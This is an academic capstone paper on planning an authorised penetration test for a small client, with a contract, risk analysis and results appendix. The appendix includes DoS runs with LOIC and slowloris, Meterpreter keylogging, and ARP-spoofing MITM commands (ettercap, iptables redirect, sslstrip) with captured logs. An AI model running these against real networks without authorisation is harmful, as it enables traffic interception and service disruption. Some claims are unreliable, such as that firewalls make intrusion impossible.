The inventory was also taken and recorded noting that an outsourced IT company was taking

care of the run and maintain aspects. After the meeting, the penetration testing team went back

to the office to outline a test plan and a contract agreement noted in Appendix G. The client did

not have a technical lawyer to understand the effects the test would have but was knowledgeable

enough to know the impact if business processes were damaged beyond resumption. Most

important to know is that the data and services required to the business stay function even after

the test. Notably, any client information or financial data of the client’s customers must also

remain with integrity and confidential. The laws requiring that client information remain private

are extensive. None of the more popular federal laws applies to this private client; however, the

law is the same. The penetration team then submitted the test plan and the contract agreement to

the client for written permission to test their network.

25



Quality Assurance

Quality Assurance Approach

The quality management approach to this test is to communicate and plan and then check

often at each phase if the project is staying on course with its design. If at any step the

communication and understanding of what needs to be done or explained starts moving off

target, than the lead penetration tester will assert themselves to regain control and proceed as

planned. The accountability between the two parties will remain in effect as part of the

deliverables from the test plan. Both parties will sign the test plan after being reviewed by legal

counsel. The terms and conditions will be set to protect each other while driving the process

forward.

Solution Testing

A solution that has been chosen for this project has been explicitly described in ISO

270001/2 in which assets, processes, and associated impacts must be defined. This practice has

been emulated here in the penetration test process and provides a methodology for the client to

move forward. The methodology is a plan, do, check, act process explained in the ISO 27001/2

standard as well as the Risk Management Framework but with different steps..

Most ineffective penetration testing is a result of poor planning and communication of the

needs of the client and the solutions from the penetration testing team. There is research

supporting that security testing does not always goes as purchased. Meaning that what you

bought is not what you are getting. Some of that research has been provided herein. The way in

which this solution is to be tested is by a real penetration test and documented here.

26



Implementation Plan

Strategy for the Implementation

The strategy for this project is to plan, do, check act in the simplest form. What we have

seen for other strategies is to throw resources at it and have some manufactured report that really

does not explain why exploits occur and how they affect the client’s business processes. The

following description in phases of rollout describes in detail how the project is to run.

Is the test just for insecure configurations and port usage or patch level? Is the testing

going to be conducted in isolation or as the devices are used together with other technology that

provides a service? Will application source code be accessible to review for vulnerabilities?

Can scripts be made to validate it? Questions like these need to be asked in order to get the

scope of the test defined. Therefore, the asset owners are to make a list of devices that provide

service that if not protected could disable the company from making a profit. This will be the in

preparation of the execution phase.

Phases of the Rollout

The sequence that will be used in rolling out this test will be done in the following

manner. First, there has to be a meeting between the penetration test group and the potential

client. It is here that the client will understand the explanation of terms and services and those

they will accept in an agreement. In between the presentation of services and the signing of the

agreement, the company needs to seek legal counsel. The company needs to do is get legal

advice from an attorney that has knowledge of technological testing where intellectual property,

assets, and risks operate in the same arena. The lawyer has to be knowledgeable about USC 18

Section 1029 & 1030, PCI, Sarbanes Oxley, as well as other laws about privacy and disclosure.

27



The company will coordinate with the lawyer to make sure that the vendor they choose to go

with operates under an agreement.

The next step is to make sure that the client has instructions to prepare documentation for

what is to be tested. In order to conduct a penetration test correctly the client will have to define

their assets and organize them. Know what is in possession and know what needs to be tested.

This could mean assigning ownership of the asset analyzed. There are a few tools to help with

the risk assessment. The client is to pick a tool or two that measures risks on software like

operating systems and one that does networks. One tool is referenced in Appendix B. This

needs to be completed in preparation of the penetration team to do their testing. It is entirely up

to the client before any testing of the infrastructure to put in place a communication tree between

the CIO and the outsourced vendor. This way if something does affect production network

someone can stop it or inform the staff that this is expected today.

The next thing the client needs to do is calculate the risk. Most often, it is the

quantitative assessment then qualitative. However, here are the two assessments presented by

the two formulas; Calculate Risk = Vulnerability X Attacks X Threat X Exposure (Snedaker,

2007). This will definitely get a dollar amount but there is some subjective evaluation of the

attack and exposure. Again, this qualitative weight in the quantitative formula is like a hybrid.

Unless the client is benchmarking from proven studies to extrapolate your numbers, there will be

some subjective input. The latter formula could be qualitative, as the reference to the frequency

will be subjective in the first year run. The next subsequent years can more easily define risk as

quantitative. A historic record will assist you in the following years.

Finally, when the penetration team arrives on site or at a location for the coordinated

effort, the first thing will be for the leader to go over the test plan. Each penetration tester has

28



their own skill level and strength and will be charged with the activity that is their strong suit.

This will complete phase one of the assessment. Phase five of the project the penetration testers

will be actively engaging their targets while keeping the lead informed of success or failures or

peculiar findings along the way. These real time results will be recorded and resources may be

allocated to different focuses as time and test warrants.

Phase six will end the agreement with test result and countermeasures will be supplied in

a hand delivered report. This helps ensure that no information gets out about the client’s test

results.

Details of the Go-Live

The project will be fully implemented when the penetration test is completed and results

delivered. If a company cannot be found for a real test, one will be used for a theoretical

penetration test.

Dependencies

Dependencies are the items that must be completed before proceeding to the next phase.

This project outlines at least three phases that should be completed before the penetration test

begins in phase four. The documentation is very important and must be completed or the entire

results of the project are in jeopardy. The documentation created and the processes driving this

project will help make the penetration test more effective.

Deliverables

The deliverables are going to be both tangible and intangible because of the technology

used. The first realization of achievement will be the report following the penetration test. First,

as in, the first derived from the process exclusively for the sake of gain. There is no higher

achievement. Notably, the process itself will yield both tangible and intangible deliverables in

29



the form of the process to list and quantify assets and their associated risks as intangible

foundation for other security standards. Also the tangible asset sheet and numerical value

assessed in determining the risks. These three deliverables are the essential part of this project.

In terms of creating the effective penetration test, that deliverable the client and the penetration

team benefit from. Both parties can walk away knowing that they had set out and done exactly

what they were going to do.

Training Plan for Users

This project does not provide any training however in order to achieve success the

terminology that will be taught to the client will be considered training.

Risk Assessment

Quantitative and Qualitative Risks

Costs are the number one driving factor around security if you look at it from the results.

Costs will be incurred if no security measures are taken. In addition, costs are required to assure

a certain level of security. Finally, costs are the numerical value that is debated between

departments when determining where to spend money. Now with this mindset the quantitative

and qualitative risks are going to be defined.

Qualitative risks associated with security have been referenced in the preceding

paragraph and it sets the scene for the discussion here and in the next paragraph for quantitative

risks. How well do you know your network infrastructure? This question is to be the subject of

the project and evaluated in terms that are relative to risk of missing business opportunities. The

risk associated with not defending the network perimeter can be devastating. First, the client

may not have confidential and available resources anymore. The downstream network devices

may not be able to provide services as they used to if software is being hacked or some malware

30



has inserted itself onto the network. There is a numerical value associated with this but for this

case we are looking at the inability for the client to remain productive and generating profit for

the shareholders or stakeholders in the wellness of the organization. What are the items at stake.

They are jobs, income, reputation, and liability to name a few. This impact on operations from

not having a penetration test evidenced by the likelihood, frequency, of an event is to take place.

This can be matched up to costs and become quantitative later. Most times this is represented in

a chart with X and Y axis filled with frequency (X), impact (Y), and events is the row on top

along X axis. The project is to safeguard against the possibility that the event will take place.

Now quantitatively speaking the cost can be found by applying cost to certain events or

assets and their frequency. This part of the project may or may not be completed by the client

but should in order to progress down the road to a security standard certification. The first cost

to review is the reputation. This cost is priceless and should be protected at any cost required.

When you have lost, your reputation from a breach there is no recovery depending on type of

breach and trade. There may be other costs of not doing the penetration test for a hosted web

application tied to an internal database. Here, if a hacker could make a way in through SQL

injection or stack overflow there might be some information or access given to help the hacker

get in. Quantitatively the cost of a down website is proportionate to the amount of sales

generated on any given day if nothing further is done from the event.

Cost/Benefit Analysis

Below are a few cost benefit analysis if certain criteria exists without action.

• If no penetration test occurs, then the cost of an intrusion and leaked data can be exceedingly

high. A lost laptop has been reported to cost $89,000.00 imagine what would happen in a

break in that could total millions of dollars. “As reported from Symantec that every

31



corporate breach cost 5.5 million” (Symantec, 2011). Most of these breaches are Trojans

worms and virus and not that what the public thinks of intrusion by network by hackers at the

front door. Most networks have real good firewalls and so intrusion through firewalls is not

possible.

• If the penetration test proceeds without proper tracking and yield results not requested or

incorrect than the cost can be high including the cost of the penetration test. Some exploits

are going to get past the penetration testers and the company looking for a real good

assessment. No penetration test can find everything given the amount of time but it does

give a snapshot in time of how the security posture stands in a few key areas. There will be

no cost overrun as this activity is budgeted and if effective should provide a return on

investment.

Notably, the client chosen for this is in a petroleum refining industry and when the Symantec

sponsored risk calculator was used to ensure the client’s risk, the results were fitting. According

to the risk calculator, this client stood to lose $98,000.00 approximately for each data breach

event. Considering the client is not very large or has a large attack surface this result is suiting as

shown in Appendix I.

Risk Mitigation

The process of identifying risk is important in order to protect the business from adverse

effects on a device, business process, or objective. Risk is defined by the opportunity that exists

for something to go wrong based on design, configuration, or use. Risk is the overall scope of

devices, processes, threats, and the frequency or likelihood that a negative event will occur. The risks

that the client identifies will be the ones tested. Effectively mitigating these risks must begin

with identification and then be solved. The best way to mitigate the risk is to find the

32



vulnerability and patch and prepare a plan around it. Depending on the costs to avoid, defer, or

prevent the risk will be the secondary driving force in the risk mitigation selection. The primary

driver will be the business process benefit. If avoidance is chosen then some aspect of the

business is omitted. This can be a loss of income in order to avoid some risk. The client would

have to ask itself if removing a line of business is worth not facing the risk. If there is a business

process that has such a high impact is not present then the associated high costs to mitigate the

threat will be incurred.

The risk associated with client’s core business application and that a zero day or other

vulnerability could occur is high than the action is preventative. Preventative action could be to

have a custodian of that application be present to patch and monitor the application and data it

produces. There could be a secondary server that is kept offline and patched ready to go. The

secondary can contain relevant data in the event that the other is compromised or destroyed.

This backup plan is a very good solution like a hot site for disaster recovery.

The alternative to having a backup server ready to launch should the primary go down

would be to have it outsourced to the cloud. The risk is still there but now you have transferred

that risk to a cloud provider who will manage that for you. The cloud provider still faces the

same risks that the client would have but at what cost is the cloud solutions for use and

maintenance versus having the server in house is the question.

Post Implementation Support and Issues

Post Implementation Support

When the penetration test is over and the results and remediation steps are presented, the

only thing left to do is to periodically test the same systems. This is part of a continuous

improvement plan and validation of countermeasures. All security standards repeat the same

33



steps in order to review essential and non-essential systems and security practices. This will be

the post implementation support. The client can elect to have the same penetration test team

review their assets as to not have to create new relationships with other groups. This consistency

will help the client’s security posture remain poised and ready to adapt to new systems and

environments.

The client will have an annual review of assets and processes and the following

penetration test will record the effectiveness of the implemented countermeasures. When the

second penetration test is completed, there will be a review of results and countermeasures from

the first test with the second test. Time taken to review the results between tests will help the

penetration test team gauge how the client’s IT department is able to perform the necessary

change. Any high-risk results will be brought before the executive office for review. Again, a

report and countermeasures will be provided to the client.

The forms required will be the same as listed in the appendix as well as the report. This

annual review by penetration test will start to present a theme for security either good or bad.

There are no other forms required externally but internally there may be guidelines and

procedures created as a product of the first test.

Post Implementation Support Resources

Providing for the future security of the client is going to be a concern for security and

revenue generation for the pen testing company. Most importantly is that the client receives

some support going forward. This effort will be first evidenced in the report that follows the test.

The countermeasures and best practices to safeguard and mitigate risks will outline some

maintenance type activities. The following guideline describes what should be done, when, and

by whom.

34



Maintenance Plan

The short duration after the penetration test will be the most active as the client receives

instructions from the pen testers to harden network devices, servers, and endpoint devices. This

lockdown session will be executed according to the results from the penetration test first and

then by industry best practices. The patching of the core business application will lead the

changes followed by the hardening of network and end point devices. This will conclude the

short-term plan.

The long-term plan will have the following built into a series of rollouts as budget and

time permits. The department will have security-hardened workstations where only necessary

services will be running to do the job. The workstations will have integrity checks performed

every hour on the MD5 hash values on files that are used by processes. If a process is initiated

by something other than the system account or from non-sanctioned programs, an alert will go

out. The process will be stopped, and blocked from making changes to the system. This will be

an example of TCSEC (Trusted Computer System Evaluation Criteria) for verified protection.

All networks will be designed securely with IDS, IPS systems in an enterprise style monitoring,

and control system. Packets will be captured and analyzed by deep packet and application layer

inspection. This intense scanning allows for the recording of network traffic for forensic

analysis. Users email will be filtered based on rules stating that email will only receive content

from known users and be subject to inspection and analysis of content. Here the email is read

and executed on VMware hosted systems that act as end users. These test VMware machines

open email like normal users and records what files and processes are initialized and modified.

When the results show no detrimental impact on the system the email is the sent to the end user

and IT department. If there are adverse effects made to the VMware system then the system

35



records the email, processes, files, and changed state of the computer. This will allow for a

lower cost of maintaining the systems over time as these threats will be mitigated in VMware. In

addition, the Security department will learn what tools and methods used to exploit users and

systems for information.

Users requiring access to files on the network will have a second machine not attached to

the internet where they will access this information. Keeping the two systems separate adds a

physical layer of protection where the more sensitive information has no means of going outside.

This will address any further vulnerability found in the core business application. Not only will

these machines not have internet access but also they will not have USB ports, CD/DVD-RW

drives, or any other means to install or remove data. Thin clients will be used with Citrix

XenApp and XenDesktop to deploy virtual desktops. These virtual desktops are maintained

locally on a server with security hardened processes are used to verify integrity before use each

day.

Conclusion, Outcomes, and Reflection

Project Summary

This project started out with the realization that not all penetration tests are done

correctly. Many tools and easy to frameworks exists to help aid in testing but should not be

relied on to lead the test. Certain criteria that the client requests to be validated often go unmet

and therefore incorrect results are circulated. The project set out to determine the how to achieve

an effective penetration test. What was presented were statistics showing that many are run

incorrectly with poor communication and design of the test plan. The field survey showed a real

time efficiency grade done by companies that perform these tests. It all indicates that more is

needed to improve the service while educating the client. Next, the project covered the phases of

36



what was to be done in phases and the details. The product of the design and testing was an

effective penetration test providing that the core application and server are resilient to most

common attacks.

Deliverables

The deliverable that the project is primarily responsible for is the results from the

penetration test and countermeasures. All other documentation created is to facilitate the process

will benefit the client. There may be diagrams submitted within the report to expand upon a

result but most will be text output.

Outcomes

The resultant effects of this project of been highly esteemed by industry professionals and

the client receiving the service. Penetration testing is certainly a very intense and time-

consuming process when there is a commitment to the act. The energy, intellect, and business

relationships that have been developed over the course of the project has heightened the sense for

the need of security. What was anticipated in the process was delivered on all counts except for

the actual test. A theoretical based on a real company was conducted in place. The results of the

DoS and DDoS attacks were not expected. It did inform the candidate that not all goes as

planned on either side of the test.

The client was very happy to receive the results of the penetration test showing how

resilient their application stood against several attacks. The manufacturer of the core business

application was very happy to hear also that the results were good and that their product is

resilient. The candidate expresses satisfaction in the effort-expensed builds towards their

profession and that the experience will help sharpen their skills for the next opportunity.

37



Reflection

The candidate has learned a great deal about the process of knowing how to legally break

into and stop service in order to provide a security assessment for a client. The steps taken in the

project were required in order to be effective and after each phase checking and planning the

next. The time take to meet with a client and provide a real understanding just how attackers

work to take down businesses was rewarding. The client really appreciates the time taken to

empower and defend their business against today’s malicious technological minds.

38



References

Pivot Point Security. (2012). Stop Wasting Your Money on Penetration Testing. Retrieved from http://pivotpointsecurity.com/downloads/18

McKerchar, R. (2012). Practical IT: how to manage cost-effective penetration testing. Retrieved

from http://nakedsecurity.sophos.com/2012/05/09/practical-it-how-to-manage-cost-effective-penetration-testing/

Imperva. (2012). Hacker Intelligence Initiative, Monthly Trend Report#13. Retrieved from

http://www.imperva.com/docs/HII_Monitoring_Hacker_Forums_2012.pdf Verizon. (2012). 2012 Data breach Investigations Report. Retrieved from

http://www.verizonbusiness.com/resources/reports/rp_data-breach-investigations-report-2012_en_xg.pdf

Netragard. (2012). How to Choose the Right Vendor. Retrieved from

http://www.netragard.com/how-to-avoid-failure-with-your-next-penetration-testvulnerability-assessment?utm_expid=26785886-2&utm_referrer=http%3A%2F%2Fwww.netragard.com%2F

Snedaker. (2007). The Best Damn IT Security Management Book Period. Retrieved from

http://mmlviewer.books24x7.com/book/id_25442/viewer.asp?bookid=25442&chunkid=761233067

Symantec. (2012). 2011 Annual Study - U.S. Cost of a Data BreachRetrieved from

http://www.slideshare.net/symantec/2011-annual-study-us-cost-of-a-data-breach-march-2012

39



Appendix A: Network Devices

Electronic Equipment Owner(s) Quantity Tested

3com 5500 24p Switch Out Sourced IT 1 No

Dell R710 Windows 2008 R2

Out Sourced IT 1 Yes

Dell Workstations Out Sourced IT 10 Yes

Cisco Phone Out Sourced IT 10 No

Printers Out Sourced IT 1 No

40



Appendix B: Critical Services

Company Services associated with devices that are critical for daily operation are mapped and listed below.

Name of

Service

Severity Associated

Device(s)

Up/Down Stream

Process

Process Owner

Project Bidding Medium Windows Server 2008 R2/Workstations/ LAN/Phones

Projects entered into Streetsmarts

Operations Manager

Project Entry High Windows Server 2008 R2/Workstations/ LAN

Projects entered into Streetsmarts/Streetsmarts auto calculation

Operations Manager

Ticket Info Entered High Windows Server 2008 R2/Workstations/ LAN

Streetsmarts auto calculation/Ticket Batch Upload

Scale Clerk

Ticket Batch Upload

High Windows Server 2008 R2/Workstations/ LAN

Streetsmarts auto calculation/Costs accounted in Streetsmarts invoice goes out

Scale Clerk

Invoices Printed and Sent

Low Windows Server 2008 R2/Workstations/ LAN/Printer

Receives all payments/Enter payments

Accounts Receivable

A/R Enter payments

Medium Windows Server 2008 R2/Workstations/ LAN/Phone

Payments post to all accounts/Issue payments to vendors

Accounts Receivable

A/P Enter payments High Windows Server 2008 R2/Workstations/ LAN/Phone

Prints checks and sends them/ Payments post to all accounts and balances

Accounts Payable

Payments post to all accounts and balances

Medium Windows Server 2008 R2/Workstations/ LAN

Issues payments to vendors and employees/Enters payments

Accounts Payable

Prints checks and sends them

Low Windows Server 2008 R2/Workstations/ LAN/Printer

Enters payments/ Prints checks and sends them

Accounts Payable

Payments post to all accounts and balances

Medium Windows Server 2008 R2/Workstations/ LAN

Prints checks and sends them

Accounts Payable

Windows IIS Service

Low Windows Server 2008 R2/Workstations/ LAN

Streetsmarts/Time Tracker

Outsourced IT

41



Appendix C: Penetration Test Plan

This is the penetration test plan that was designed after receiving the list of critical devices and associated services. This test plan will be followed and not deviated from in the initial test. The client can express further testing be needed per test result for further analysis in writing at any time after the initial test. The following is a list of items for the test plan.

1. Target Devices and Services a. Have all identified targets of evaluation documented b. Obtain and review prioritized list of services

2. Scan Operating Systems a. Use Microsoft Baseline Security Analyzer b. Use Nmap to discover devices banner grabbing c. Use Nessus to discover vulnerabilities

3. Test Network Devices a. Use Nmap to discover devices and ports b. Discover services c. DoS/DDoS Attack

4. Test Core Business Application a. Test core business application against

i. Clear text traffic capturing ii. Man in the middle

iii. Spoofing iv. Armitage w/Meterpreter

42



Appendix C: Penetration Test Action Plan (Con’t)

43



Appendix D: Audited IT Processes

This section contains information about the processes that run along with IT assets in the penetration test.

44



Appendix D: Audited IT Processes (Con’t)

This section contains information about the processes that run along with IT assets in the penetration test.

Appendix E: Qualitative Risk Matrix

Event 1 Event 2 Event 3

Medium High Critical

Low Medium High

Low Low Medium

Appendix F: List of Legal Concerns

1. Customer data privacy 2. Transaction integrity (Non PCI Transactions) 3. Theft of client data 4. Corporate Espionage 5. Employee Data privacy 6. Tax and Accounting Record Keeping

Since this company is not publically traded the following information should be considered when reviewing risk and requirements for testing as time permits.

45



Appendix G: Sample Contract

PENETRATION TESTING CONTRACT This contract is between Pen-test team(hereinafter referred to as the “provider”) and target client (hereinafter referred to as the “client”) for the supply of Penetration Testing services by the provider for the client. Whereas the provider provides certain computer and systems security consulting and testing services including Penetration Testing services, and Whereas the client wishes to retain the provider to provide computer and systems security services, specifically Penetration Testing services, therefore The client does hereby retain the provider for the purpose of providing Penetration Testing services on the client’s computers and network infrastructure. The objective of the Penetration Testing service is to identify and report on security posture including any vulnerability to allow the client to close the issues in a planned manner outlined by provider, thus significantly raising the level of their security protection. The client understands that computer security is a continually growing and evolving environment and that testing by Pen-test team does not mean that the client’s site is secure from every form of attack. There is no such thing as 100% effective testing, and for example it is never possible to test for vulnerabilities in software or systems that are not known at the time of testing. Further security breaches can and frequently occur from internal sources whose access is not a function of system configuration and/or external access security issues. The client has provided the provider with certain required information regarding the scope and range of the tests from the inventory audit and business process assessment and the client hereby warrants that all information provided is true and accurate and that the client owns or is authorized to represent the owners of the computers and systems described. The client further warrants and represents that they are authorized to enter into binding legal agreements. The provider has provided a written quote for the services contracted in the amount of $1,600.00. The client, prior to any services being performed by the provider, shall make half of payment for contracted services one week prior to start date. A copy of the written quote is attached to this contract as Schedule A. The provider will complete the penetration test on the agreed upon start date of 15-Jan-2013 and finish date 18-Jan-2013. Upon furnishing the written report and remediation effort required to harden the client’s systems, all remaining payments or balance shall be paid in full. Any payment that exceeds 30 days past report delivery date shall accrue interest of five (5%) percent compounded each business day. The provider shall be under no liability whatever to the buyer for any indirect loss and/or expense (including loss of profit) suffered by the buyer arising out of a breach by the provider of this contract. In the event of any breach of this contract by the provider the remedies of the buyer shall be limited to a maximum of fees paid by the client. There will be a communication plan between the pen test team and the operation manager of the client. At each point in the test there will be notification of that test beginning to the operations manager only. If there are, any adverse effects of the test the Operations Manager will notify the lead pen tester. The test will stop and results noted.

46



Both parties shall maintain this contract as confidential. No information about this contract, contract terms, or contract fees shall be released by either party. Information about the client’s business or

Appendix G: Sample Contract (Con’t)

computer systems or security situation that the provider obtains during the course of its work will not be released to any third party without prior written approval. The provider and the client have imparted and may from time to time impart to each other certain confidential information relating to each other’s business including specific documentation. Each party agrees that it shall use such confidential information solely for the purposes of the service and that it shall not disclose directly or indirectly to any third party such information either expressed or otherwise. Where disclosure to a third party by either party is essential such party with the agreement of the other party will prior to any such disclosure obtain from any such third party duly binding agreements to maintain in confidence the information to be disclosed to the same extent at least as the parties are bound. This contract is subject to the laws of the State of Connecticut, USA. All disputes arising out of this contract shall be subject to the exclusive jurisdiction of the State of Connecticut, USA. Neither party shall be liable for any default due to any act of God, war, strike, lockout, industrial action, fire, flood, drought, storm or other event beyond the reasonable control of either party. Schedule A The following is an estimate for the test plan. It will take one work day or eight (8) hours tom complete the following work Time 08:00- 08:30 Target Devices and Services

Have all identified targets of evaluation documented Obtain and review prioritized list of services 08:30-09:30 Test Operating Systems

Use Microsoft Baseline Security Analyzer Use Nmap to discover devices banner grabbing Use Nessus to discover vulnerabilities 09:30-10:30 Test Network Devices Use Nmap to discover devices and ports Discover services DoS/DDoS Attack 10:30-12:00 Test Core Business Application

Armitage and meterpreter used for testing but not successful. 13:00-14:30 Man in the middle:

47



Appendix H: Sample Contract (Con’t)

Spoofing & Clear text traffic capturing 14:30-17:00 Contingency Testing, Report with Countermeasures Contingency testing in case one or more test open or deny success Provide results in a brief outlining the test and results Provide Countermeasures

Appendix I: Data Breach Calculator Report

48



Appendix J: Penetration Results and Countermeasures

Report and Countermeasures

Executive Summary

The following is a report of the tests taken to gain a foothold, capture data, and/or deny access to the client’s business processes. There will be a review of tests run and what the outcomes resulted. If there are any countermeasures to take to thwart such activities, they will be presented. The following report is for Client X who requested that their network be tested for exploits and deficiencies that could hold them liable for data leakage or suffer loss of service. The tests conducted were very focused and concentrated on a workstation and the server.

Test Objectives

1. Target Devices and Services a. Have all identified targets of evaluation documented b. Obtain and review prioritized list of services

2. Scan Operating Systems a. Use Microsoft Baseline Security Analyzer b. Use Nmap to discover devices banner grabbing c. Use Nessus to discover vulnerabilities

3. Test Network Devices a. Use Nmap to discover devices and ports b. Discover services c. DoS/DDoS Attack

4. Test Core Business Application a. Test core business application against

i. Clear text traffic capturing ii. Man in the middle

iii. Spoofing iv. Armitage w/Meterpreter

Port Scanning Results and Issues

Scanning Windows machines

The first test was scanning of services and ports on Microsoft devices. The test discovered the default Windows system ports open for unsigned SMB, telnet, and high ports. This included the port scanning by Nessus as well as the Microsoft Baseline Analyzer. The results from Nessus showed that there existed an unsigned SMB/Samba port (445) as well as using the open clear text port channel (23). Nessus found only (1) medium and (1) low alert for the server 10.10.10.5. Port (135) on the workstation was found open and that is used for remote procedure protocol. Port (139) was found open and used with SMB for file sharing with other devices beside Microsoft. Port (808) is the Streetsmarts Web based application running encrypted. Port (992) was found to be an SSL port with a certificate error. Additional ports were found open ranging from (49152-49157) and is due from a release from Microsoft

49



in January 2008 to start the open port range at that (49152). Some P2P (peer-to-peer) file sharing has been known to run over these ports. The possible attack could have occurred but was not conducted in test was escalation in privileges via SMB vulnerability and brute forcing usernames and passwords. The attacker also could have social engineered the information from an unsuspecting user. There is a probability this could have happened but the users answer to only one IT person and thus really negate the probability of that occurring.

Countermeasures

Using a host-based firewall either Microsoft’s built-in or vendor, the client can block traffic in either direction form the host. In the penetration test it was recorded that with Zonealarm Free Antivirus and Firewall was able to deny our only exploit to gain control or information of the systems. Simply trusting only the gateway, and the server, the workstation would not have been easily compromised. It is possible to assume the identity of the gateway but locking down ports would have greatly reduced that threat. Below in appendix AA through AC are the scan results.

DoS/DDoS Testing The application server MAXWELLSM Dos/DDoS Test Used Low Orbit Ion Cannon (LOIC) infamously known by use from the hacktivist group Anonymous to perform a denial of service against the server in order to deny application use to client machine. Later, another machine was used to point the low Ion cannon at the Windows 7 platform client machine. Test 1 - Target port 808 on application server with 10 thread and numerous TCP requests wait for response Attack started 13:20 12-Jan-2013 Results: After 5 minutes 10 threads and speed set to fastest. The server 2008 and windows 7 client were still able to communicate. Test 2 - Target port 808 on application server with 100 threads and numerous TCP requests wait for response. Attack started 13:32 13:46 12-Jan-2013 Results: 109,106,402 TCP requests and application is up. Windows error reporting service stopped and started at least twice. Test 3 - Target port 808 on application server with 1000 thread and numerous http requests do not wait for response. See if IIS crashes. Attack started 13:55 12-Jan-2013 Results: Despite LOIC requesting many pages many times and showing no failures, the application still launched. Test 4 - DDoS target port 80 1000 threads http. Two machines hitting the server started 14:05 14:15 ended. This included (3) LOICs, and one python script slowloris.py with 1000 new threads every ten (10) seconds. Results: Still launched application

Countermeasures No countermeasure directly required but the use of a network access control (NAC) device could help other protocols. This device would help enforce the number of connections per host on the network. This would greatly improve the chances to allow other protocols on the network to communicate like VoIP and lower the chances of other denial of service attacks.

50



Application Server Testing Test 1: Used websploit Results: Nothing to report as the communication between the application and the server is encrypted from client side software. Test 2: Meterpreter used in with Armitage A connection made it impossible to glean any data or provide a way to leak data out; Meterpreter was used in this test knowing the administrator password the connection was possible. Even a regular user with password known would be able to both pass the hash dump and crack passwords later in order to attempt to escalate privileges. Time being the factor is how successful the cracker would be. Results: We were able to log keystrokes and take screen shots of the user’s computer. This is one way that data could be captured. In this test, we show that key logging and screen captures are possible however, they are not very effective as shown below, Image 4.

Countermeasures

In the test, it was discovered that knowing the username or a username and or escalating privileges by brute forcing passwords helped make the reverse tcp shell possible. One of the ways we did stop this from happening again was to use Zone Alarms Free Antivirus and Firewall software. This is where a trusted gateway and server was setup and the rest of the same subnet was untrusted. This solution is an inexpensive way to harden the network.

Image 1 – Armitage Text Output of Key logging

Image 2 – Email Credentials Entered

51



Image 3 Screenshot before Launching Encrypted Application

Image 4 - After Launching Encrypted Application Notice in the image below that the application icon is present big ‘S’ in the tool bar and on the workstation it is in the foreground. However, the image reveals that it is not seen and therefore encrypted to the reverse tcp shell.

52



Sniffing and MITM Attacks Using Ettercap we copied traffic from the user and the gateway to our penetration testing laptop. We used Ettercap, urlsnarf, dnsiff, and Driftnet with these commands entered to see traffic. In ettercap we scanned the subnet and added a target 1 = gateway and target 2 = the victim machine. Here we were able to get a copy of everything being sent by the user to the laptop first before going to the real gateway. This is done with sslstrip, iptables, ettercap with MITM attack arp spoofing ettercap --mitm ARP:REMOTE --text --quiet --write /root/sslstrip/ettercap.log --iface eth0 Also the GUI was used to pick target client Windows 7 machine 10.10.10.7 and second target the application server 10.10.10.5. Execute the following commands

In the CLI we entered: root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward root@bt:/#cat /proc/sys/net/ipv4/ip_forward root@bt:# sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-

port 10000 Now verify it took the filter root@bt:~# iptables -L -t nat Chain PREROUTING (policy ACCEPT) target prot opt source destination REDIRECT tcp -- anywhere anywhere tcp dpt:www redir ports 10000 Chain INPUT (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination Chain POSTROUTING (policy ACCEPT) target prot opt source destination root@bt:# sudo python sslstrip.py -l 1000 -f lock.ico

Results sslstrip: No data or text of any sort was visible as all data was being passed through and encrypted channel. Results with dsniff: We addresses were visible, but no usernames or passwords. These results show the application is very secure. Results with driftnet: There were no pictures or images of the site going across. There were web addresses being listed. Results with urlsnarf: root@bt:~# urlsnarf -n -i eth0 urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128] 10.10.10.7 - - [15/Jan/2013:23:10:12 -0500] "GET http://www.google.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 10.10.10.7 - - [15/Jan/2013:23:10:13 -0500] "GET

53



10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nqRS HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nr9Z HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nr9K HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nr9A HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)" 10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] "GET http://www.mwsystems.com/servlet/servlet.FileDownload?file=01540000000nroD HTTP/1.1" - - "http://10.10.10.5/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"

Executed commands: root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward root@bt:/#cat /proc/sys/net/ipv4/ip_forward 1 In another terminal, we used Driftnet root@bt:/# driftnet -i eth0 root@bt:/# driftnet -i eth0 -v -s (in an attempt to gain audio being streamed) We could then see what the user was looking at for images. Results: Images from core business application were not being sent to our laptop despite driftnet running root@bt:~# driftnet -i eth0 -v driftnet: using temporary file directory /tmp/driftnet-AmaowM driftnet: listening on eth0 in promiscuous mode driftnet: using filter expression `tcp' driftnet: started display child, pid 2562 driftnet: link-level header length is 14 bytes .driftnet: new connection: 10.10.10.7:49363 -> 23.45.9.75:80 ...driftnet: new connection: 10.10.10.7:49365 -> 23.45.9.75:80 ...driftnet: new connection: 10.10.10.7:49364 -> 23.45.9.75:80 ...driftnet: new connection: 10.10.10.7:49368 -> 23.45.9.75:80

Countermeasures

